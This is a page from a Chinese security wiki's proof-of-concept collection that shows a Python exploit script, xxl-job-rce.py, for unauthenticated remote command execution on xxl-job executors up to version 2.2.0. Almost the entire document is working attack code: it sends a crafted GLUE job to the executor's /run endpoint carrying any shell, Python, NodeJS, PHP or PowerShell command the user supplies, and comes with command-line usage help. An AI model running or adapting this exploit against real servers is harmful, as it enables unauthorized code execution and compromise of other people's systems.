menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right All_wiki chevron_right POChouse-main chevron_right XXLjob chevron_right xxl-job API接口未授权访问RCE chevron_right xxl-job-rce.py
  • home 首页
  • brightness_4 暗黑模式
  • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    xxl-job-rce.py
    1.99 KB / 2021-06-28 05:31:32
        #xxl-job未授权加命令执行漏洞支持 =<v2.2.0版本
    #支持脚本语言有Shell、Python、NodeJS、PHP、PowerShell
    #windows推荐使用PowerShell,Linux推荐使用shell
    #如果不行可尝试其它方式,前提是环境支持
    
    
    import requests
    import argparse
    import time
    import sys
    
    proxies = {
        "http": "http://127.0.0.1:8080",
        "https": "http://127.0.0.1:8080",
    }
    
    
    def exp(url,cmd,method):
        times = round(time.time() * 1000)
        headers = {'X-Requested-With': 'XMLHttpRequest',
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36',
    'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
    'Accept-Encoding': 'gzip, deflate'}
        data = '''{
      "jobId": 1,
      "executorHandler": "demoJobHandler",
      "executorParams": "demoJobHandler",
      "executorBlockStrategy": "COVER_EARLY",
      "executorTimeout": 0,
      "logId": 1,
      "logDateTime": 1586629003729,
      "glueType": "GLUE_'''+method+'''",
      "glueSource": "'''+cmd+'''",
      "glueUpdatetime":''' +str(times)+''',
      "broadcastIndex": 0,
      "broadcastTotal": 0
    }'''
    
    
    
        response = requests.post(url=url+"/run",headers=headers,data=data)
        if response.status_code == 200:
            print("commond excute success")
        else:
            print("access failed")
    
    if __name__ == '__main__':
        parser = argparse.ArgumentParser(description='python3 xxl-job-rce.py [IP Address] -p [Prot(default 9999)] -c [Command] -m[Ccript Method(default powershell)]',
                                         epilog='Use:python3 xxl-job-poc.py 192.168.229.146 -c calc')
        parser.add_argument('address', nargs='*',help='Destination IP address')
        parser.add_argument('-p', '--port',default=9999)
        parser.add_argument('-c', '--commond')
        parser.add_argument('-m', '--method',default="powershell",help="Shell、Python、NodeJS、PHP、PowerShell")
        args = parser.parse_args()
        url = 'http://'+args.address[0]+':'+str(args.port)
        method = args.method.upper()
        exp(url,args.commond,method)
    
    
    links
    file_download